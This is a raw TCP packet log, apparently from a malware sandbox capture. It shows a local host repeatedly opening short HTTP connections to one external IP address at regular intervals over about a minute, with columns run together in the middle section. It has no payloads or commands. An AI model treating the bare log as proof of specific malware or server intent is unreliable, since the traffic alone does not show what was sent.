Dec 14, 2024 03:03:08.718075037 CET | 80 | 49823 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:08.718266964 CET | 49823 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:08.718445063 CET | 80 | 49825 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:08.718524933 CET | 49825 | 80 | 192.168.2.5 | 94.232.249.187
                                                                        Dec 14, 2024 03:03:08.718760967 CET4982580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:08.838397980 CET804982594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:10.100992918 CET804982594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:10.101196051 CET4982580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:10.208086967 CET4982580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:10.327888966 CET804982594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:10.708271980 CET804982594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:10.708375931 CET4982580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:10.816530943 CET4982580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:10.936300993 CET804982594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:11.317264080 CET804982594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:11.317373991 CET4982580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:11.426047087 CET4982580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:11.545835972 CET804982594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:11.921869993 CET804982594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:11.921947002 CET4982580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:12.044405937 CET4982580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:12.044729948 CET4983580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:12.165309906 CET804982594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:12.165445089 CET4982580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:12.165577888 CET804983594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:12.165653944 CET4983580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:12.165823936 CET4983580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:12.285677910 CET804983594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:13.507949114 CET804983594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:13.508042097 CET4983580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:13.613442898 CET4983580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:13.733254910 CET804983594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:14.105442047 CET804983594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:14.105556011 CET4983580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:14.222621918 CET4983580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:14.222994089 CET4984180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:14.342848063 CET804983594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:14.342894077 CET804984194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:14.342948914 CET4983580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:14.343113899 CET4984180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:14.343206882 CET4984180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:14.463865042 CET804984194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:15.691982985 CET804984194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:15.692049980 CET4984180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:15.800853968 CET4984180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:15.920706034 CET804984194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:16.306653023 CET804984194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:16.306760073 CET4984180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:16.425750017 CET4984180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:16.426194906 CET4984780192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:16.545826912 CET804984194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:16.545958042 CET4984180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:16.545974016 CET804984794.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:16.546160936 CET4984780192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:16.546365976 CET4984780192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:16.666409016 CET804984794.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:17.892489910 CET804984794.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:17.892807007 CET4984780192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:18.003992081 CET4984780192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:18.004221916 CET4985280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:18.123920918 CET804985294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:18.124041080 CET4985280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:18.124059916 CET804984794.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:18.124212027 CET4984780192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:18.124299049 CET4985280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:18.244045973 CET804985294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:19.467962027 CET804985294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:19.468085051 CET4985280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:19.581993103 CET4985280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:19.582221031 CET4985680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:19.702094078 CET804985694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:19.702188015 CET4985680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:19.702339888 CET804985294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:19.702405930 CET4985280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:19.702567101 CET4985680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:19.822274923 CET804985694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:21.044363976 CET804985694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:21.044770956 CET4985680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:21.159965038 CET4985680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:21.160366058 CET4986180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:21.280492067 CET804985694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:21.280512094 CET804986194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:21.280565023 CET4985680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:21.280626059 CET4986180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:21.281172991 CET4986180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:21.401293993 CET804986194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:22.655149937 CET804986194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:22.655205011 CET4986180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:22.769424915 CET4986180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:22.769752979 CET4986680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:22.889570951 CET804986694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:22.889589071 CET804986194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:22.889673948 CET4986180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:22.889689922 CET4986680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:22.889854908 CET4986680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:23.011419058 CET804986694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:24.256819010 CET804986694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:24.257003069 CET4986680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:24.363647938 CET4986680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:24.483623028 CET804986694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:24.859121084 CET804986694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:24.859340906 CET4986680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:24.972738981 CET4986680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:24.973184109 CET4987280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:25.092924118 CET804986694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:25.092946053 CET804987294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:25.093190908 CET4986680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:25.093197107 CET4987280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:25.093702078 CET4987280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:25.213356972 CET804987294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:26.438208103 CET804987294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:26.438504934 CET4987280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:26.550704956 CET4987280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:26.550939083 CET4987680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:26.670623064 CET804987694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:26.670705080 CET4987680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:26.670846939 CET804987294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:26.670857906 CET4987680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:26.670893908 CET4987280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:26.790486097 CET804987694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:28.022310019 CET804987694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:28.022434950 CET4987680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:28.336019039 CET4987680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:28.336287975 CET4988280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:28.456146002 CET804988294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:28.456248045 CET4988280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:28.456394911 CET4988280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:28.462945938 CET804987694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:28.463043928 CET4987680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:28.576149940 CET804988294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:29.808022976 CET804988294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:29.809117079 CET4988280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:29.925719023 CET4988280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:29.926071882 CET4988680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:30.046175957 CET804988294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:30.046312094 CET804988694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:30.046391010 CET4988280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:30.046447039 CET4988680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:30.046716928 CET4988680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:30.166404963 CET804988694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:31.399544001 CET804988694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:31.399703026 CET4988680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:31.519499063 CET4988680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:31.519917011 CET4989080192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:31.639657974 CET804988694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:31.639847040 CET804989094.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:31.639914036 CET4988680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:31.639945030 CET4989080192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:31.640180111 CET4989080192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:31.760076046 CET804989094.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:32.982063055 CET804989094.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:32.982323885 CET4989080192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:33.098160982 CET4989080192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:33.098495007 CET4989580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:33.218647003 CET804989094.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:33.218739986 CET804989594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:33.218878984 CET4989080192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:33.218959093 CET4989580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:33.219090939 CET4989580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:33.339426994 CET804989594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:34.569000959 CET804989594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:34.569217920 CET4989580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:34.675803900 CET4989580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:34.796071053 CET804989594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:35.171402931 CET804989594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:35.171675920 CET4989580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:35.285221100 CET4989580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:35.285511017 CET4990180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:35.405559063 CET804990194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:35.405653954 CET804989594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:35.405760050 CET4990180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:35.405910969 CET4989580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:35.406033993 CET4990180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:35.525959015 CET804990194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:36.746660948 CET804990194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:36.746835947 CET4990180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:36.863297939 CET4990180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:36.863688946 CET4990580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:37.038484097 CET804990594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:37.038523912 CET804990194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:37.038594007 CET4990580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:37.038769960 CET4990180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:37.038882017 CET4990580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:37.212811947 CET804990594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:38.392321110 CET804990594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:38.392496109 CET4990580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:38.503832102 CET4990580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:38.504278898 CET4991180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:38.624963045 CET804990594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:38.625041008 CET4990580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:38.625085115 CET804991194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:38.625179052 CET4991180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:38.625365973 CET4991180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:38.745063066 CET804991194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:39.995623112 CET804991194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:39.995707989 CET4991180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:40.113157988 CET4991180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:40.113466978 CET4991580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:40.233472109 CET804991594.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:40.233571053 CET804991194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:40.233624935 CET4991580192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:40.233664036 CET4991180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:40.233910084 CET4991580192.168.2.594.232.249.187
Dec 14, 2024 03:03:40.354551077 CET  80     49915  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:41.677377939 CET  80     49915  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:41.677607059 CET  49915  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:41.785342932 CET  49915  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:41.905529022 CET  80     49915  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:42.282877922 CET  80     49915  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:42.283099890 CET  49915  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:42.394881010 CET  49915  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:42.395133018 CET  49921  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:42.515162945 CET  80     49921  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:42.515216112 CET  80     49915  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:42.515252113 CET  49921  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:42.515276909 CET  49915  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:42.515485048 CET  49921  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:42.635426044 CET  80     49921  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:43.859419107 CET  80     49921  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:43.859510899 CET  49921  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:43.973509073 CET  49921  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:43.973870993 CET  49926  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:44.093955040 CET  80     49921  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:44.094027996 CET  80     49926  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:44.094192982 CET  49921  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:44.094250917 CET  49926  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:44.094465971 CET  49926  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:44.216428041 CET  80     49926  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:45.435652971 CET  80     49926  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:45.435951948 CET  49926  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:45.550714016 CET  49926  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:45.551013947 CET  49930  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:45.671055079 CET  80     49930  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:45.671142101 CET  80     49926  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:45.671159029 CET  49930  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:45.671214104 CET  49926  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:45.671370029 CET  49930  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:45.793026924 CET  80     49930  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:47.021720886 CET  80     49930  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:47.021806955 CET  49930  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:47.128827095 CET  49930  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:47.248821974 CET  80     49930  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:47.629327059 CET  80     49930  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:47.629534960 CET  49930  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:47.738549948 CET  49930  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:47.738713980 CET  49936  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:47.859005928 CET  80     49936  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:47.859090090 CET  49936  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:47.859289885 CET  49936  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:47.859363079 CET  80     49930  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:47.859610081 CET  49930  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:47.979283094 CET  80     49936  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:49.207911015 CET  80     49936  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:49.207978010 CET  49936  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:49.316361904 CET  49936  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:49.436748028 CET  80     49936  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:49.820957899 CET  80     49936  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:49.821173906 CET  49936  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:49.925767899 CET  49936  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:50.046364069 CET  80     49936  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:50.426228046 CET  80     49936  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:50.426316977 CET  49936  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:50.535387993 CET  49936  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:50.535501957 CET  49944  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:50.655843019 CET  80     49944  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:50.655890942 CET  80     49936  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:50.655985117 CET  49936  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:50.655991077 CET  49944  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:50.656239986 CET  49944  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:50.776130915 CET  80     49944  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:52.004081011 CET  80     49944  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:52.004210949 CET  49944  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:52.113394022 CET  49944  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:52.234549999 CET  80     49944  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:52.613415003 CET  80     49944  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:52.613533020 CET  49944  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:52.722951889 CET  49944  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:52.843069077 CET  80     49944  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:53.218858004 CET  80     49944  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:53.219152927 CET  49944  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:53.332068920 CET  49944  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:53.332401037 CET  49951  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:53.452739954 CET  80     49944  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:53.452867031 CET  80     49951  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:53.452877045 CET  49944  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:53.452986002 CET  49951  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:53.453154087 CET  49951  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:53.573158979 CET  80     49951  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:54.800787926 CET  80     49951  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:54.800879955 CET  49951  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:54.910211086 CET  49951  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:55.030378103 CET  80     49951  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:55.411422014 CET  80     49951  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:55.413208008 CET  49951  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:55.535222054 CET  49951  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:55.535624981 CET  49957  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:55.655356884 CET  80     49951  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:55.655404091 CET  80     49957  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:55.655508041 CET  49951  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:55.655703068 CET  49957  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:55.655803919 CET  49957  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:55.775429964 CET  80     49957  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:57.005861044 CET  80     49957  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:57.005944967 CET  49957  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:57.113296032 CET  49957  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:57.113593102 CET  49962  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:57.233357906 CET  80     49962  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:57.233568907 CET  80     49957  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:57.233649015 CET  49962  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:57.233676910 CET  49957  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:57.233951092 CET  49962  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:57.353574038 CET  80     49962  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:58.578170061 CET  80     49962  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:58.578327894 CET  49962  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:58.693955898 CET  49962  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:58.694297075 CET  49966  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:58.813905001 CET  80     49962  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:58.813963890 CET  49962  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:58.814080000 CET  80     49966  94.232.249.187  192.168.2.5
Dec 14, 2024 03:03:58.814157009 CET  49966  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:58.814621925 CET  49966  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:03:58.934376001 CET  80     49966  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:00.162966013 CET  80     49966  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:00.163080931 CET  49966  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:00.286890030 CET  49966  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:00.287262917 CET  49972  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:00.407113075 CET  80     49966  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:00.407175064 CET  80     49972  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:00.407196999 CET  49966  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:00.407253027 CET  49972  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:00.407417059 CET  49972  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:00.527092934 CET  80     49972  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:01.756186008 CET  80     49972  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:01.756259918 CET  49972  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:01.865541935 CET  49972  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:01.866076946 CET  49976  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:01.985856056 CET  80     49972  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:01.985876083 CET  80     49976  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:01.985935926 CET  49972  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:01.985995054 CET  49976  80     192.168.2.5     94.232.249.187
